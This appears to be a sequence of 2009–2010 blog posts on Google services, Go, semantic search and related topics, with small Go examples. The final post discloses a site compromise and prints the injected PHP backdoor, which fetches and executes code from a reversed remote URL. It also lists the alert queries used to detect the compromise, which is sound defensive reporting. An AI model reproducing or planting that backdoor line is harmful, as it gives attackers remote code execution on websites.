Google Crisis Response and Relief

May 25th, 2010

Google’s Crisis Response team has a landing page for the Gulf oil spill featuring overlays for Google Maps/Earth. This joins their pages for other recent natural disasters, such as the earthquakes in Haiti, Chile and China. Some pages support ‘crowdsourcing’ by allowing people to upload information, data and queries.


Google Crisis Response page for the 2010 Gulf oil spill


Here’s how the Google team describes their work and mission:

“Working with the input of subject matter experts and in conjunction with like-minded organizations and the development community at large, Google Crisis Response facilitates the development and refinement of crisis response technology—with the ultimate goal of helping victims help themselves and helping first responders/relief agencies/governments/citizens help victims.

When a major disaster strikes, the Google Crisis Response team collects fresh high-resolution imagery plus other event-specific data, then publishes this information on a dedicated landing page.

Google Crisis Response Mission

To develop, maintain, and optimize a worldwide, rapid-deployment protocol to speed the dissemination of situational information and increase the efficacy of rescue and humanitarian aid activities in response to quick-onset disasters.

Google Crisis Response will:

  • Coordinate with other platforms, organizations and teams
  • Build tools to surface near-real-time data
  • Support response/relief organizations
  • Respond in times of crisis

There doesn’t seem to be a list of these pages online, but here are a few:


A review of the Google Go programming language

November 12th, 2009

Mark Chu-Carroll is a Google software engineer who’s written a long, detailed and informed review of Google’s new programming language, Go. It’s worth a read if you’re interested in understanding what Go is like as a programming language. Here are a few points that I took note of.

    “The guys who designed Go were very focused on keeping things as small and simple as possible. When you look at it in contrast to a language like C++, it’s absolutely striking. Go is very small, and very simple. There’s no cruft. No redundancy. Everything has been pared down. But for the most part, they give you what you need. If you want a C-like language with some basic object-oriented features and garbage collection, Go is about as simple as you could realistically hope to get.”

    “The most innovative thing about it is its type system. … It ends up giving you something with the flavor of Python-ish duck typing, but with full type-checking from the compiler.”

    “Go programs compile really astonishingly quickly. When I first tried it, I thought that I had made a mistake building the compiler. It was just too damned fast. I’d never seen anything quite like it.”

    “At the end of the day, what do I think? I like Go, but I don’t love it. If it had generics, it would definitely be my favorite of the C/C++/C#/Java family. It’s got a very elegant simplicity to it which I really like. The interface type system is wonderful. The overall structure of programs and modules is excellent. But it’s got some ugliness. … It’s not going to wipe C++ off the face of the earth. But I think it will establish itself as a solid alternative.”
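To see what Chu-Carroll means by “Python-ish duck typing, but with full type-checking from the compiler,” here’s a minimal Go interface example of my own (not from his review): any type with the right method set satisfies an interface implicitly, and the compiler verifies it.

```go
package main

import "fmt"

// Describer is satisfied implicitly by any type that has a
// Describe() string method -- no "implements" declaration needed.
type Describer interface {
	Describe() string
}

type Point struct{ X, Y int }

func (p Point) Describe() string { return fmt.Sprintf("(%d,%d)", p.X, p.Y) }

func main() {
	var d Describer = Point{1, 2} // statically checked "duck typing"
	fmt.Println(d.Describe())
}
```

The assignment to `d` is where the compile-time check happens: if Point lacked a Describe method, this wouldn’t build.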

Go sounds like a language that will help you grow as a computer scientist if you use it. That’s a good enough recommendation for me.


Google VP on semantic search and the Semantic Web

November 11th, 2009

PCWorld has a story, Google VP Mayer Describes the Perfect Search Engine, with some interesting comments on semantic search from Marissa Mayer, Google’s vice president of Search Products & User Experience.

“IDGNS: What’s the status of semantic search at Google? You have said in the past that through “brute force” — analyzing massive amounts of queries and Web content — Google’s engine can deliver results that make it seem as if it understood things semantically, when it really functions using other algorithmic approaches. Is that still the preferred approach?

Mayer: We believe in building intelligent systems that learn off of data in an automated way, [and then] tuning and refining them. When people talk about semantic search and the semantic Web, they usually mean something that is very manual, with maps of various associations between words and things like that. We think you can get to a much better level of understanding through pattern-matching data, building large-scale systems. That’s how the brain works. That’s why you have all these fuzzy connections, because the brain is constantly processing lots and lots of data all the time.

IDGNS: A couple of years ago or so, some experts were predicting that semantic technology would revolutionize search and blindside Google, but that hasn’t happened. It seems that semantic search efforts have hit a wall, especially because semantic engines are hard to scale.

Mayer: The problem is that language changes. Web pages change. How people express themselves changes. And all those things matter in terms of how well semantic search applies. That’s why it’s better to have an approach that’s based on machine learning and that changes, iterates and responds to the data. That’s a more robust approach. That’s not to say that semantic search has no part in search. It’s just that for us, we really prefer to focus on things that can scale. If we could come up with a semantic search solution that could scale, we would be very excited about that. For now, what we’re seeing is that a lot of our methods approximate the intelligence of semantic search but do it through other means.”

I interpret these comments to mean that Google’s management still views the concept of semantic search (and the Semantic Web) as involving better understanding of the intended meaning of text in documents and queries. The W3C’s web of data model is still not on their radar.


Dashboard shows data Google has about you

November 5th, 2009

Google added a great new service, Dashboard, that summarizes data stored for a Google account — see MY ACCOUNT>PERSONAL SETTINGS>DASHBOARD.

“Designed to be simple and useful, the Dashboard summarizes data for each product that you use (when signed in to your account) and provides you direct links to control your personal settings. Today, the Dashboard covers more than 20 products and services, including Gmail, Calendar, Docs, Web History, Orkut, YouTube, Picasa, Talk, Reader, Alerts, Latitude and many more. The scale and level of detail of the Dashboard is unprecedented, and we’re delighted to be the first Internet company to offer this — and we hope it will become the standard.”

This is a good move on Google’s part. But while there’s a lot of information included, it’s not everything that Google knows about you — e.g., data in cookies, click-through data from search results and information from companies it’s acquired, like DoubleClick. Still, it is a big step in a positive direction.


WebFinger: a finger protocol for the Web

August 15th, 2009

Maybe WebFinger will succeed where others have failed. At what? At providing a simple handle for a person that can be easily used to get basic information that the person wants to make available. The WebFinger proposal is to use an email address as the handle.

WebFinger, a.k.a. Personal Web Discovery: we’re bringing back the finger protocol, but over HTTP this time.

Techcrunch has a post on this with some background: Google Points At WebFinger. Your Gmail Address Could Soon Be Your ID.

There’s some excitement around the web today among a certain group of high profile techies. What are they so excited about? Something called WebFinger, and the fact that Google is apparently getting serious about supporting it. So what is it?

It’s an extension of something called the “finger protocol” that was used in the earlier days of the web to identify people by their email addresses. As the web expanded, the finger protocol faded out, but the idea of needing a unified way to identify yourself has not. That’s why you keep hearing about OpenID and the like all the time.

The current focus of the WebFinger group is on developing the spec for accessing a user’s metadata given their handle. Using RDF and the FOAF vocabulary should be a no-brainer for representing the metadata.
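To make the idea concrete, here’s a sketch of the lookup step: given an email-style handle, build the HTTP discovery URL for the host. The `/.well-known/webfinger` path and `resource=acct:` form follow the spec the WebFinger effort eventually settled on; the drafts circulating at the time used XRD host-meta, so treat this as an illustration, not the protocol of record.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// webfingerURL builds a discovery URL for an email-style handle like
// "alice@example.com". The endpoint path is the one standardized later;
// this is a sketch of the lookup idea, not the 2009 draft wire format.
func webfingerURL(handle string) (string, error) {
	at := strings.LastIndex(handle, "@")
	if at < 0 || at == len(handle)-1 {
		return "", fmt.Errorf("not an email-style handle: %q", handle)
	}
	host := handle[at+1:]
	q := url.Values{"resource": {"acct:" + handle}}
	return "https://" + host + "/.well-known/webfinger?" + q.Encode(), nil
}

func main() {
	u, _ := webfingerURL("alice@example.com")
	fmt.Println(u)
}
```

The point is the indirection: the handle alone tells a client which host to ask, and the host decides what metadata the person has chosen to publish.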


Google Reader gets more social

July 16th, 2009

The most frequent complaint about facebook I’ve seen is that it provides a button to show you like an item, but not one for dislike. Google Reader recently added new social features, including the ability for users to mark a post as liked, but it likewise doesn’t let you indicate a dislike. You can unlike an item that you previously liked, but that just gets you back to a neutral stance.

It’s probably a prudent choice, aimed at keeping things civil. But there are two schools of thought about the old adage “If you don’t have anything nice to say about someone …”, one of which ends with “come sit next to me.”.

The first time you like a post on Google Reader it warns you that it’s a public act. Indeed, clicking on the “N people liked this” link at the top of a post in Reader shows you the Google names of readers who liked it. You can click through to their Google profiles or to see a list of other liked and shared items. Public indeed! At least on facebook your likes are visible only to people who can see the corresponding item.

I think Google Reader’s new social features look like they might be useful, but time will tell.


Google is from Mars, Facebook is from Venus

June 23rd, 2009

Wired has an interesting article on Facebook vs. Google, Great Wall of Facebook: The Social Network’s Plan to Dominate the Internet — and Keep Google Out.

“Today, the Google-Facebook rivalry isn’t just going strong, it has evolved into a full-blown battle over the future of the Internet—its structure, design, and utility. For the last decade or so, the Web has been defined by Google’s algorithms—rigorous and efficient equations that parse practically every byte of online activity to build a dispassionate atlas of the online world. Facebook CEO Mark Zuckerberg envisions a more personalized, humanized Web, where our network of friends, colleagues, peers, and family is our primary source of information, just as it is offline. In Zuckerberg’s vision, users will query this “social graph” to find a doctor, the best camera, or someone to hire—rather than tapping the cold mathematics of a Google search. It is a complete rethinking of how we navigate the online world, one that places Facebook right at the center. In other words, right where Google is now.”

This is definitely a David and Goliath match, what with Facebook not having turned a profit yet. The article does a good job of pointing out how their services are different and complement one another.

At the risk of evoking discredited stereotypes, maybe Google is from Mars and Facebook is from Venus.


BlindSearch evaluates Google, Bing and Yahoo search engines

June 7th, 2009

Who’s got the best basic web search engine? One way to approach that question is to conduct an experiment in which subjects rank the results returned by several engines without knowing which is which.

BlindSearch is a simple and neat site that collects ‘objective’ opinions on search quality by showing query results from Google, Yahoo and Bing side by side without identifying which is which and inviting you to select the best.

“Type in a search query above, hit search then vote for the column which you believe best matches your query. The columns are randomised with every query.

The goal of this site is simple, we want to see what happens when you remove the branding from search engines. How differently will you perceive the results?”
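The column randomization is what makes the experiment blind: each query shows the three result sets in a fresh random order, so position can’t leak which engine is which. Here’s my own reconstruction of that step (not BlindSearch’s actual code):

```go
package main

import (
	"fmt"
	"math/rand"
)

// shuffleColumns returns the engines in a random order for one query,
// so voters can't learn which column belongs to which engine.
// A reconstruction of the idea behind BlindSearch, not its real code.
func shuffleColumns(engines []string) []string {
	out := append([]string(nil), engines...) // don't mutate the caller's slice
	rand.Shuffle(len(out), func(i, j int) { out[i], out[j] = out[j], out[i] })
	return out
}

func main() {
	fmt.Println(shuffleColumns([]string{"Google", "Bing", "Yahoo"}))
}
```

The server would remember the column-to-engine mapping per query so the vote can be attributed after the user clicks.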


BlindSearch evaluates Google, Bing and Yahoo

As of this writing there have been 1,679 votes for preferred results, with Google getting 39%, Bing 39% and Yahoo 22%.

Update 2:14pm EDT 6/7: Google 45%, Bing 32%, Yahoo 22% | 11,130 votes


Google Chrome for Linux and Mac

June 5th, 2009

How’s this for truth in advertising? The Chromium blog announces early developer-channel versions of Google Chrome for Mac OS X and Linux, but warns people not to try them in a post titled Danger: Mac and Linux builds available.

“In order to get more feedback from developers, we have early developer channel versions of Google Chrome for Mac OS X and Linux, but whatever you do, please DON’T DOWNLOAD THEM! Unless of course you are a developer or take great pleasure in incomplete, unpredictable, and potentially crashing software. How incomplete? So incomplete that, among other things, you won’t yet be able to view YouTube videos, change your privacy settings, set your default search provider, or even print.”

Of course, they know that this will make trying them irresistible to some of us. If that includes you, go get the Mac or Linux version.


Bing vs. Google, side by side comparison

June 1st, 2009

Microsoft’s new Bing search engine is getting a lot of interest. Glenn McDonald posts about a nice side-by-side Bing vs Google comparator that he developed. It makes it easy to compare how the two services do on a range of different types of searches. Here are the queries that Glenn said he found useful in developing his initial opinion.

I sense from some of these queries that he is probing places where an advanced search engine can exploit a little bit of semantic knowledge. For example, recognizing that a user’s query “boston to asheville” matches a common pattern “⟨place⟩ to ⟨place⟩”, and she probably is interested in information about how to travel from the first location to the second. It seems like Google has been working on adding more such patterns, at least for the low-hanging fruit.
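A toy version of such a pattern is easy to write as a regular expression; real query understanding is of course far richer than this, so take it only as an illustration of the idea:

```go
package main

import (
	"fmt"
	"regexp"
)

// travelQuery is a toy "<place> to <place>" matcher -- a stand-in for
// the kind of query template a search engine might recognize, not
// anything Google or Bing actually uses.
var travelQuery = regexp.MustCompile(`^([a-z ]+?)\s+to\s+([a-z ]+)$`)

func main() {
	if m := travelQuery.FindStringSubmatch("boston to asheville"); m != nil {
		fmt.Printf("from=%s to=%s\n", m[1], m[2])
	}
}
```

Once a query matches the template, the engine can route it to a travel-specific result source instead of plain document ranking.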

Of course, if everyone hits this site it may get throttled or blocked by either or both of the search engines. @Glenn — would you be willing to share your code?

(spotted on hacker news)


Google Wave as a new communication model

May 28th, 2009

Google Wave looks interesting. Google describes it as “a new tool for communication and collaboration on the web” and it’s a funny mix of email, instant messaging, wikis, and Facebook wall interactions. Or maybe IRC for the new century. This is from a post, Went Walkabout. Brought back Google Wave, on the Google blog.

“A “wave” is equal parts conversation and document, where people can communicate and work together with richly formatted text, photos, videos, maps, and more. Here’s how it works: In Google Wave you create a wave and add people to it. Everyone on your wave can use richly formatted text, photos, gadgets, and even feeds from other sources on the web. They can insert a reply or edit the wave directly. It’s concurrent rich-text editing, where you see on your screen nearly instantly what your fellow collaborators are typing in your wave. That means Google Wave is just as well suited for quick messages as for persistent content — it allows for both collaboration and communication. You can also use “playback” to rewind the wave and see how it evolved.”

Google Wave is not available yet, but you can sign up to be notified when it’s launched.

Here’s a random thought. Our models for communication in multiagent systems (e.g., KQML and FIPA) were informed by if not based on email and, to a lesser degree, IM. If Wave is a useful new communication model for humans, does it have a counterpart for software agents? If so, I suspect that ideas from the Semantic Web will be useful to provide a “rich content” for agents.

For more views, see posts by o’reilly, techcrunch, BusinessWeek and Gabor Cselle.


Ebiquity Google alert tripwires triggered

May 21st, 2009

Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.

<?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>

This code caused URLs like https://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)
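The “obfuscation” is just PHP’s strrev: the attacker stores the URL backwards so a casual grep for the domain won’t find it. Undoing it is one loop (here in Go rather than PHP, as an illustration):

```go
package main

import "fmt"

// reverse undoes PHP's strrev for ASCII strings -- the trick the
// injected code used to hide the URL it fetched code from.
func reverse(s string) string {
	b := []byte(s)
	for i, j := 0, len(b)-1; i < j; i, j = i+1, j-1 {
		b[i], b[j] = b[j], b[i]
	}
	return string(b)
}

func main() {
	// The reversed string from the injected PHP above.
	fmt.Println(reverse("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))
}
```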

We discovered the problem through a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted on ebiquity.umbc.edu. For example:

  • adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
  • viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu

I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.


Google alert for a hacked website

The results of this Google search reveal many compromised blogs from the .edu domain.